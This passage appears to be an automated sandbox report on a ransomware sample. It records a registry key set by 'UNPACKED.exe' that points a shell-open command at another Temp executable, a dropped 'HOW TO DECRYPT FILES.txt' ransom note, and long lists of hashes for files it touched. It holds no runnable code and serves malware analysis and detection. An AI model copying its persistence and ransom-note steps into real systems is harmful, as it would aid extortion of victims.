| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe" | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe
"C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\HOW TO DECRYPT FILES.txt
Network
Files
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt
| MD5 | 6468d057d7cb30ecd6283ea01e6ab5fd |
| SHA1 | df5379d633e558544ebfcb88b6ad3f53e6df09b0 |
| SHA256 | a2ce2b6c9fc04d26e595e45849916efe01ceba18159013171ce44142830aeffe |
| SHA512 | be080542f286df5cd9ff126dcba0057ef0ecf2d8b7767911035f419fc5e8dab4f1a055c04d07e4337af8fdebfae6a254337ab20ab0309eaa1696a1e14f87c10a |
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif
| MD5 | 06837df93346f96cf67c02d0e5f56a21 |
| SHA1 | 12effd49c886693c9d5a8f36f529896166428932 |
| SHA256 | 90be465df45b4eb86ea75aa898ab375201ebde5fb2fadd8f4643f5060c7b1715 |
| SHA512 | 2cf0baf215fc192ebe39c009a7ca4bd2d259af9eb4f7f42d209d8880fc7c005cbcc27163baaf2ab0d6783584ffd63e9ce8f49b3a0e422a6331a57ac50757b611 |
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt
| MD5 | 67cc2591cd0966981c2d1d411b84ab1d |
| SHA1 | e072c8275405370e43fedac40ea8256ba76cfcec |
| SHA256 | 3064bb8212089de899a8927835026dadfbd1829c08adf6ab246f3d266b4a04c1 |
| SHA512 | 5711d607410853c6527be11eec48fd0d2a1500ebb0b4ae6cedd5617c00f2c15c7c7e150b9328db51596d851b1e3a0b07403a80890c5a51c13613271748d2cb0e |
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt
| MD5 | df2bcda9628e5a8f6256606660750cad |
| SHA1 | 11d18ed36d04e894f18a4f00e9d6314a754e9425 |
| SHA256 | 9e129676838b8a4cedaad9dac0663d6a51b836bf2852801c837dc662915b8107 |
| SHA512 | 2ba71c9bd38f731ea4a2fe3efeb194661c62d853b9dee4c9f24660069722635f1d2e0ce8620a9089a83d8f36bd27479f984b3515a3821aa52501baa1c47f9e02 |
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt
| MD5 | e0810a82160a9a61674e219e23dab8f1 |
| SHA1 | c4778258a53c37f39eff0058e6e8bf0643a4d35e |
| SHA256 | 373cde86656ea29dace5ae73520e03b5219c07c6a7fe470f48f236134f9f2d30 |
| SHA512 | af2da00dbab75823e4f3707871c8062a5b883fbc2f73ef979b942128dbf195a4d943a5023ff1486fc012e3d67d9cb55e9c42f0ef000e842b47f27dd29d3e3521 |
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF
| MD5 | 06df8edd89154d68c49af15d65720af3 |
| SHA1 | be179da8a60543d3e0bd828be6a9bd3401ed2664 |
| SHA256 | 103f9efbf111ee715ce67f81c3fbe566f93c1e71cec4bac7020ca0eab7c6cf1e |
| SHA512 | b13a57147f34cfe6cc7728f80ea62e4cd31f734e4f9d5b7ae9d45f9e4e2e9704a93292342b0ec45bcde4e4796f74b53722a79ed31e5a8c00f1ac1edb28e0229d |
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF
| MD5 | 85ebed08c41b43efbf4a4f555afa2d0e |
| SHA1 | eed2e36357889c9295ba65b12aed733515eed6d7 |
| SHA256 | 9ee38814debdd2d38f3c9f6363d5f7fa77f423bd33d76fd2a074a7fb6cb7a928 |
| SHA512 | 15be03f2df3bdd6b2a0a355924b1024947e91615dea1be1309e791db18ce1c33a09173d348a6c14edd8db6784439927946d6b2c4377919105012b537fbfdbd1c |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF
| MD5 | 4ef1096e556fbfc5fde3e1fa06304f73 |
| SHA1 | 461f0c5affaf5efdb569e0e696579fc7c993050d |
| SHA256 | b5648a7bc06ac614a32061c53f70c852df9f09d6c634a2494bb5e5d81d6216ba |
| SHA512 | 32c1db24fd9f823431c14935b2623262f100f33ed962dc1faca7c28cec7ba25eb8b31cd12da94f7763e212d50aa454ee2f389776c9b19f20b377dffb8ad35d80 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif
| MD5 | 50b93896736d7b1f45aaa17d64d8e73c |
| SHA1 | bac863b6e98c4a73a4042a0110ebc81a7cfa41ab |
| SHA256 | 88abe1b6734cba5e42a6a2746673beb8a8e53f1029036bf4d3705bfeb7a66670 |
| SHA512 | 37848c90e46a2b5c425b3d27e4aba046a580f3789d3723db0912b81a0e81527bc4719e1d45b880b010e9d942a54303199eb40eb5f5241265306634b5db3a0f40 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif
| MD5 | c4f38f4a65aad94cecdec9b0b3dc735a |
| SHA1 | 2937507381fcd367ef767d44589b8cd25599db1b |
| SHA256 | 42d7c219c08b92feb8e137bcfbab6d0ab51bf163e571a613cd6fa22abbe6d777 |
| SHA512 | 73cd9f5576fb8ad65accbf5144ed7f60fbaf60fb2299caef10317cc7d21ac041610b8bd0dff902559cfdc886c03be893fff3b8a78cb11309dba5cc77fd9a223a |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif
| MD5 | aee3f1890e967d09b48762e169dc9caa |
| SHA1 | c9b41f9841b7e943f252551a8de2930e569b7698 |
| SHA256 | f97eb632aaf651e0c326eb3804165ed9fa77dbf0e47ddaef99f2b6bd12e7b275 |
| SHA512 | 6af301f811dd3a6762f12627805e82121a348c510f6af22a180a9be841c3e499083be1716aea7acb78217d85faf5516d83511a4a6c79877456a20562bdb95082 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif
| MD5 | e65a7bf78b818c4d661ee2c411cfc9ec |
| SHA1 | 22d21964b9ce666c0b0bcecf42b635ff695732a1 |
| SHA256 | 446efb2650d61bcce3c1de99c83d3e85bccf9967b80908cd9fd40579552ab88f |
| SHA512 | 3903f1f67d3cad27c44140318abf3df1f4827f49f6c39da1bc4bd56ff1ec3cca401bad7b8a173f4e78979cfb3ea61f1d2e9dca206e116a223e7b9deaffe40a02 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif
| MD5 | d262f8f5b77ddbdea33d04ad91525632 |
| SHA1 | c7206787efc2ba5ade7b24a38a48ff9c0d7f0057 |
| SHA256 | c47ad452ff99b20576c6c4baa0a4c4620181cfc668d66c487b3f70d5fee3c12b |
| SHA512 | f027a6a81af7f02459285a33937f777090de33d36b075cc407c9ae2b5ba9587439de5d160134156368273f35ce155cbb380b3a80146796a8e3bbc11cf8f31c8c |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif
| MD5 | 11f4420064bd9c612e45770ead5c6cd6 |
| SHA1 | bdd3c907ab0e9b5863e2ea552499369987b28b0b |
| SHA256 | 31847c8af31e9f1775c56204275710ed642ae1ea55b8be38d1b82bec0d9d0d37 |
| SHA512 | f0a25fa5aeeb04f333e4adf7f21b38694e6b305192eb9a2897c6f505f1c63aaf2a09cb65cffd52f8181a627a4ba16828f5d03e063c4f2ba86b4dc5026a057e53 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif
| MD5 | 07370fcad2acfd6ad45e85548bdf2ea9 |
| SHA1 | d649a822dbc04308b827ef611bc994856c2c6b09 |
| SHA256 | d33de678a555b23d52c3665a3b2b455e5120c9670992dde7e21693a07dd1339d |
| SHA512 | 96dec13b7706fc8c43acb3b56d056950d322f5c4d56105a6be4011416f75c34169defd364bcbbbca2133ead6cf4cca3d535edacf173d3ca4fa764a24135759a7 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif
| MD5 | 3f10bef3b41361e23f49bda84f4400c3 |
| SHA1 | 8078027961aa7d96cef0a8713ac54156fae463e1 |
| SHA256 | 59caa5c4066cb8d3c54140fb9db47db9123c7d0837f3544804fb4429b75314db |
| SHA512 | 9d152df2453d741ecb7aa34c53e0c4b8b424b19cf5b3010a1fe88110b90a87fbb4ffbc469fe47b0398214d60362f44590dabae3c98e174d649097a9f33db4e31 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif
| MD5 | 414d995c962bdbd37a8a5df57c704973 |
| SHA1 | 6d9d2d9c7bb60f32b3720a30d92957340791d473 |
| SHA256 | 59806998e738b31094776810ed6122db03abf45153fe0f8c8663a7f54edeb32f |
| SHA512 | 49063e078b5e5730f95ae3ec203335e15787b5c8245e1d5132f6614d66d1b299b83d11a62156ff27a3d20a700e43a00d3afd7c6a13f7a55e22d0b628343bbe6a |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif
| MD5 | 2aa0238eab9f40d5bc0085e061580fd5 |
| SHA1 | 7737b425f04dd4ce9bf886b031eee19ec56bf41d |
| SHA256 | b7c60fff09733bba301054964fed0f63cf71b8f0f603f8cbaf17a60ef8a61a8a |
| SHA512 | 6e125207fa57b4b8922ba2c5aa957088af161987b7764ffd6415eb26da5cd6b9657813b457a83c53364acb4dfd984c02ce0c6040326b78052b77816db65f25e6 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif
| MD5 | 78b05b567f3d91eedf537e28cc382a73 |
| SHA1 | 56631473dc2ebaa4d98307b8966f102822f79f3d |
| SHA256 | b046cef058bd43d6afa4c5d4eb1c563edb6c7dfee97dc25e77f3cfe25c888aab |
| SHA512 | 32aa999092d8d2a7cb67370f5c26ea3ca761611cbc841d49999cea3c0ec3ed91478eb1e3cae0bb5afb303931a5d59c09189eb85ef301a634d019d5a4ea79c2cc |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF
| MD5 | a3fcdcfe734d663c003ee6d2b4cc1c3b |
| SHA1 | 3f6297c831b3611f403a878cb39680403d33c603 |
| SHA256 | 85746c8ae6da83216af31569503c86b1011055abbdabfc5a7c98ccca56626fea |
| SHA512 | 1cf3c313c446c16d2a3af3041bbac7a6be229b9dbb95c0b48ab2841e054fdf6da9432b87ffe4fc15e35d46a138ae3d3eb0e01e5aaa1ebe110404cc176460b616 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF
| MD5 | 110879749f7228ff0ed850cffd64b0d1 |
| SHA1 | ebafaf8a53fc98c7cdecff5e70890681102cfa78 |
| SHA256 | caa9b95b19cdad10bde5628a9613ab9d93b3943ac9a2a28d42eba1f2b2ee429f |
| SHA512 | 46c0379bbe55907ae3416ce188b5cf86982af4372e7f2ab4601ce731f4c3a111b0923e82f941186bcfcf04ed0cf0f78092d276b157484463a24c803c66901459 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF
| MD5 | 97596fb884501ca1680cdf19ad5418c9 |
| SHA1 | 0017139a784fb05c7cbc2286492b233ce9dfb909 |
| SHA256 | 64a56358c52fc799a001e3a565b1606795e3fd72a5364512ef23c6f168b3b284 |
| SHA512 | d4517e46db786e811c1ba8710464d379a9d6b70df7ab29bb78e1f9d366fc61bacc39991c2423194560bfca2a060a1b04c5b02dc25164e765a288f880c1d33da7 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF
| MD5 | 4c69c0b9f117ae040c6c16e06ac1afb7 |
| SHA1 | 4844368ca95d4f7adbf5a1f01b0e8d037ab3f39d |
| SHA256 | 8e425e4507452cd0799eabb419c39f516a1674b228389626ef4e9badb1d51497 |
| SHA512 | cb97e342d4bf9f917160b9d0c7e3c66f685e8dd09685a472e052d602455ce6aa5d49df82ad91519842e2b07c7ab121ab862f48bb33a4268bf65e4f307557602d |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif
| MD5 | 0355f9afcdf5e2fdcc2cd7684221402f |
| SHA1 | 7746da91b7a9fb1ce14b9626e08b183e0a30c064 |
| SHA256 | a414577665e2c56535079a9b85bb6e52e72225e64cfbe1647f4f82e658753ae5 |
| SHA512 | 69db12eb398351d5cbba494469f3c8be11d8fbbca1cdb26b064400532d59f118c56ae904cd51e3488992c27aebe307267690fceca5dff1560410eceab2657dd3 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif
| MD5 | a511bdf17358095494591f8d89c1cba0 |
| SHA1 | 2109a6215c7a977bf8cfa8f7dc4b84e1e6970ff7 |
| SHA256 | 8a3f4ba400b38c8b7d72573e4427c6b6523cb6d4dbd1e44ba654ad7c1cb9214f |
| SHA512 | 7438e9273496235d53b85967c01457699bd64c5237a250781e7b1550d29b7f3ead8275e29641960dcccfaf283ac294b5f960baf9b1c511b2e1e4ab21ab03b554 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp
| MD5 | 00307c5fb3ed1ff4cb77d02709af2bb1 |
| SHA1 | 1d7d4e097cdc915015ed67b56bbf1b08e94cc8b9 |
| SHA256 | 9164bc45a2095376e0cad24bc592397bcb9f7f6467f1a90116633cdac5b1f6ea |
| SHA512 | 8f8f34fc01cb4eddc1c52209a722cea609d46136db2efb0c011d7e6c0c00d7f3d6b943f5f92598ac9441eb32862f57924e21f58ef5744cbef8f5667b91572664 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg
| MD5 | 0be8122e76ea7bb9f76f64fb52241ba7 |
| SHA1 | ad86980bb0e8a9cdcfb53f35d5a42d3447312ac5 |
| SHA256 | e1a77275c763af1a236351f1049188341d3d92a730eb1914eca88e4be9c8c193 |
| SHA512 | 9897be38f0b37a22c8811ad602c252400c966fc49206be9a3e9448c9f26464fecc8d989870b754ae56e3389a54dd8bff78cfb9e45b3a8e89af4c3a561d536ab1 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif
| MD5 | f85c835ba9c5223d4df2a663c14b25d5 |
| SHA1 | c872280ef6c868b863d6846a98dfa5094e35a41c |
| SHA256 | 0dd4f48edd4ffbf01263177343bbae522259cdffad61bc21b66c131c16376ea3 |
| SHA512 | 42ed2b673588b49533bd72397791937b1913bcc84af549b3c7de697a854e94f16b366fb4720499eee19b3911af868ee9fb265b46c09aab9ba692d8f674958fcc |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF
| MD5 | 35d0bed55b4e646415eb5bc05459b36e |
| SHA1 | fddd4e3879857b638c2fb6f32af44ae7e64ebf99 |
| SHA256 | 2beba5a928a0d465d702f6bdddbedc2bbd7c61ca885a08653d23c51810520577 |
| SHA512 | 6eaafd46a939a46436d60b74b5bae7fda3bcac42847b48e60b0717501c524481b55e08dbad8cd98ef2a3cc9ce9a46c2b41ca4531f7bc9e890e7bf39fc7c36219 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF
| MD5 | c7d1434ee4ef56ee5c80ce71311df3b9 |
| SHA1 | fb7ca26ee7b342031698802dd008d0ad84a3764c |
| SHA256 | 973cdbfa6d2fda416a934d8bf08e6c2a61b0709ba9f85f93b2777cf5a685de36 |
| SHA512 | 9c09f0322ba5d82c6be860767add2fe8445a6fae86a6f05d93bdb42977747cb3523d7e555fc336373b196624aa8d951f30ecb021783591417ee7a39c900b5b5a |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF
| MD5 | 601c8c0f6bfede21b01ed4344284095a |
| SHA1 | 1cd1848e970ecdfee35764d848a61bb5cbcf188d |
| SHA256 | 8d788af57c7b6fd639e519629b2a05bfe2581c11db61744b05a9c945abb86da7 |
| SHA512 | 1da63b1e701e3a0b3366c58721e45ae666a45a25de34ca0414267fdcd4081fdec3949e07137422fa36f7ca4907a17ba5d1c31d7eaa75dc820b903c9f77a54542 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF
| MD5 | 24a23f721835e21129f3e73de5d8395d |
| SHA1 | a258e5a3b4d6238497a91c9f3e5d7de1ecf1ce82 |
| SHA256 | e5f1a43ed89ce695d6940b8db0f7424cb59660fe39bf6e018ee6447658d1a25b |
| SHA512 | 74cc65549104210768523acff171cedd705a0f3e3a304db2c334a8d8025ee7978f6f9f073037c730a43b93f33f8187ac9c854a90385295523e073c5e5c7f47b7 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF
| MD5 | 0f7dcdb64958c58343336cd65da80a8f |
| SHA1 | 73db8500cae99d767fe8955127d1a02662e582a7 |
| SHA256 | e2d09bacfaa958eb4a6d90dc49abf96b8fd159d4a958c237703fed6bb4a2e53a |
| SHA512 | 5a4fd3d2a729d498853e7401c91e1b8d90cf5bd10d4c8128cb36f43ed5eca23ad4f5dce5594fc66400d7202e208fa2213c45bc0d9b2916ceec0ecd91021dc311 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF
| MD5 | cb665ecfb83e74d2bc2df27cb64254f5 |
| SHA1 | 7506b136ac4d6b13c83a16d55dfc0fab81f459d3 |
| SHA256 | ca798f18c844fb08e6bb0c808cbeaa815a56f176a6cdf0c622b68a16e96a14ec |
| SHA512 | b3462700c30201e546b709d7eedf08644a10616cb9a235aff283da38983f53180ae4597b28703a8555fb52e0ddf34562667a70467127b612e60529882cf53222 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF
| MD5 | 330c2d3957b6bbdb274668cc9263058b |
| SHA1 | 8ebbd5b06438d785849e74c9397a0a8bbcd43027 |
| SHA256 | ea037008037c7650e0afccf8c53baf133e5b801cd1197cf8238cac25614627bc |
| SHA512 | 668f5dce08b1cbe6d8b202b9e634fb0db75b4b12378ab4da21c95bf68d954a50c10288a01928ef8d6be5ad707334403049f0723126415e3e2e9fe213d9a957be |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF
| MD5 | e4d869711060bbfef18f42718fce3e31 |
| SHA1 | 240979c151dff73c0d87358ae7ed4fac3fcbe9d3 |
| SHA256 | b5d6eecd24fec2abdd3f55449c7c94d779124fd4f185331e22c73ee29919c062 |
| SHA512 | 17dd2b1004ff8e54abfde3d5cb8a42a80173deca697bcdc628f73db3717b4e56d6f3751a21b98442cbe4ca7c82a52be8f079c445d0804001d15fdfc5a2986827 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF
| MD5 | 72d06fed69eed57661bae8c3bbfefd04 |
| SHA1 | d8599ddfc77ee9b9c051a5b002546817c22fc69e |
| SHA256 | a5962a6b16f418a369e456371382cb2b08a6771d42cf1eae474cb8e64d2a6810 |
| SHA512 | 56da9a579c7b0f8e260b959d9aba7a8cc9be79fa6b043ed2d5349b94264500108c16d91494c26bdb6696fcbf258cbc3fc8d66a2ea321ccc5426479cb34eec165 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif
| MD5 | 2e9631742b55152f741fcdc5e3664c1d |
| SHA1 | 88bf82a74807f3ce9cd3d86bf4d175182a1695f5 |
| SHA256 | 13615109b28319a104e9d540fbb7c985f14c6fa3c0b262890c80454ff82eed2a |
| SHA512 | 2439c3dcd21133485482b6df08e4582e70e1202c933484de458c786c8d677a5309939c7abc8f57b1d52a0a802249d540d9cd7aef5fdfd81cf007763792d97d84 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF
| MD5 | 0573af8f669ac60864445130e2c96051 |
| SHA1 | d4ba91692736eed627206527fe2239a99db40817 |
| SHA256 | a024e6bfbb059d76b9431c3bdb0b2412de383f7301885e5fcfdd4762b312bd9e |
| SHA512 | 80dc941d215a4edbca7a6afa798c2361ee690cfbbf8dd4310f510d09259f04b66634fa0cdaf85946c002d68f1618e95acab78a393ff74447c36f540d9cf35bbb |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg
| MD5 | 7f3561bd3eb3b1ee30e49001a0e3a49f |
| SHA1 | d0c0cf0838b71723d505f741cd187db0550a5780 |
| SHA256 | 1dff6485394ca5667c7512a36f4d4fd2ea9efa11b5f774f4ad85a2d9a3246e11 |
| SHA512 | 9a2eb3398d72180c3554d77eb433ab1132d9c6896c7ecdb1ae3f2e3e2df281a91a1552e11b4a6289420ce13f114e94bda1da20241090cc02debe14ebc8ed1f33 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif
| MD5 | 7e048a9114a0f85728134ba9eacf2814 |
| SHA1 | 8c39061dd59b692628e058e9ba233d8b5ccd5983 |
| SHA256 | 0d2aab0ce4daaa2007957c181c5c32b0e96ad48c4be926816ce714f322f8fd07 |
| SHA512 | 05a0c9e0213e77ebf90671aba894ac74e9cdf758313dc7defe6ff8dbc56927c5972f658430b8d26671708e7f6f69b17fbf1589a54bb40eaaf9269e7fc9bebfa6 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif
| MD5 | 698a4ce179742cab953ea3bca2412c30 |
| SHA1 | 325b7c16532938d8b9286e8d9032911ce71a7f79 |
| SHA256 | 4a204a0eacee1d54eeaca9fe5ef123a594f5918380a46eac9c976bee158052bd |
| SHA512 | 1fb6681bfa26c4e786e173561ad7dce2a25419aa2f57dd5a5b53b3206568df44935c378c87e43102bfb7e4832c68a5951ada698df630711bc3bea6a881337543 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif
| MD5 | 8872c401c1a741f01714c7cf617bbf1a |
| SHA1 | 0276f6f8dd460568fc3d35834535cda7dbf6ba63 |
| SHA256 | 35f2ad5bc40328e0e54e8a28cdc9db9b5a7894cdf1605c084e108ad34a7cf2ef |
| SHA512 | 71cfcc3165d1931a399db085873439440f6ec71918a717359984c948dd0d769c2799adc9705bf1345d216ed38b62cc917580952036783f718759ad9d12e0a56d |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF
| MD5 | 62d91a112536741cfa95fc82bb79c123 |
| SHA1 | ce4b05523b621bb159fe17e221c94f07ab66fa39 |
| SHA256 | 41b657e8094580be04228f8b0fd66a7aa028250e7ee8b407189ddab16149488e |
| SHA512 | a4f73ce203e316d34317cb2e003c34349bb8b2e2087467750d8e376b72679efb389473cb324699c225571c8f16688d4f708244f99fef214d7ced65fbebf95932 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg
| MD5 | e671f7d67f6c4242c187e673a7ba4b4d |
| SHA1 | 024b1bca6a8650805111789380babc2e6b84514b |
| SHA256 | ad6c168f14426c50cfa40581e597f1ea4415ed83f4010c79ef31d0e030109037 |
| SHA512 | 96ba50c21b6508af0ef56f2f4e49e23a7cc4cff54ff7a299afa557bcad70a4a764782cd559393b362898499e745cc8299368d3b41b137fe0a7cde8fd6cb2e141 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF
| MD5 | 348b08106f2d11747d35009ffa4a302a |
| SHA1 | ed1bbd38128a361b4f43f8520dd390aca0994116 |
| SHA256 | 6951e417b74f21133940d769800b3d64ac2d90f5a827809f9f06208849a6c851 |
| SHA512 | 885fac5c4f40711ee96063e36c0579026c17c0368539e7c25b07358bf36857c09917d60197543c9afd7f128c06cc2f5169afbc7aa51765b53891b97ba3e4da5f |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif
| MD5 | ba9eec5044c8570f7bf4780cdd9f3710 |
| SHA1 | 238bad4b1c6a4ec381023ba5aa0d2bcfd82888e7 |
| SHA256 | 8e0110d49fe7d17d37f43adf685644300e240e9d7fa9f6e1044d462710e8234b |
| SHA512 | 4ce8d2f85b9abf6ce7fb8704ff3b572658aa8dfc2c91c846bc600d03c74ab9b6e38e67b3e7b2fb26f011a1585942ae2170e89313fe75b8d404a94162d9aad278 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF
| MD5 | c5d679d9abf2a699dd621af3d5d9e217 |
| SHA1 | c0dbec0f4a42606a37125d167f33b3bcd6de84c5 |
| SHA256 | c1e95f9395bbde24f4ad0a54f57762cf6a7fba4624b0e2c8401454a16acaf4b3 |
| SHA512 | fcc3d89c9804d4110539020c3b478a837d95664e0001d03b6794c3e11e987cdd72a6639fd96d5842b92c8bd05d85ba63b4b764e08e8d9e08cce89384378ddd9b |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_OFF.GIF
| MD5 | 1a4f0bd5cb939a9eec70c861f936d778 |
| SHA1 | e16903427a768abe86a87df09830ce29d8e8e74b |
| SHA256 | 4b577e3b8197fe504fed3e099ed24f95fdd141320e98d72e84205328c6efcd75 |
| SHA512 | e1f76e00cea2a153fb5ced6f02332dc3f9ef92067eb2ab73e388622a2c1a7c894ae64bd9f2aa3d1e010a442e17fe015096b5b78387161233d4109d75dcad487f |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF
| MD5 | 55cab7182de4fd36efc7d4ce15d4fe1c |
| SHA1 | 7e88211f750a91f477a37a1fb3f0fcd7d56e1dbb |
| SHA256 | c5103963ca79d2f435a123068ba47158a7e707d1d2697c3a6ab84ab6af532210 |
| SHA512 | 94135fa5bba99c787dc6132cc63aa2bd5602a084f2d127f89fc3b1c971f3d80529e48569be349e070e68e8f138755448034faa3770cd07b190dc43d1bdec856c |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif
| MD5 | 783f900cdbf4d3aaf8894fa783368dd8 |
| SHA1 | 40331ea9aa7302b90d1515b438b514adfdc5d8f8 |
| SHA256 | d77b6c5cd6a20e9731016c7776dd86639e3d2b2f67d54a2dab0784c5c5d10e78 |
| SHA512 | 11bd7e4ba37d4fdbba7c1693d1453da59ef6bf54b90c2a92a05b2aa9353a0b494e2298d47ff7173042a1cbbdae83b01307074c9b39c48c5940deccd7da790ab0 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif
| MD5 | 2faf4026d11c512bf28c3ab14b57b0bd |
| SHA1 | 0c8a5d2ce008b92a88eb87d39e3364ac698ffffc |
| SHA256 | 8f32ccbee0f1b3c6255c9dbd0464081d52924281c7b8fecf0426d08b13107f97 |
| SHA512 | 924d6c3d96cbe7e96d916f05adc4ae04b25941ec7b6022cdc304aeab10c1f30adc76ec3ee706cfe17968607df2ee17054b635209736f5e4d9b4c57ca0cd1ca60 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif
| MD5 | f24d95737e535d5bbb72168c479b9c35 |
| SHA1 | 061a1a8475464581e62f0feb894e2377858d79c8 |
| SHA256 | 271e4df641f1cabb33657f543c929d1a191d7ccf9a27ee4d15e27eac44c6b7e8 |
| SHA512 | f5960ab758c7952b5686a875f430db165f2c94ac0602a68c822e0276a0aa04a8dc21432e2535450910d9a372224d69ab712505d6eb9da88a20d9159adbe29b50 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif
| MD5 | fda667f798405c756c3b8ec49efd9f88 |
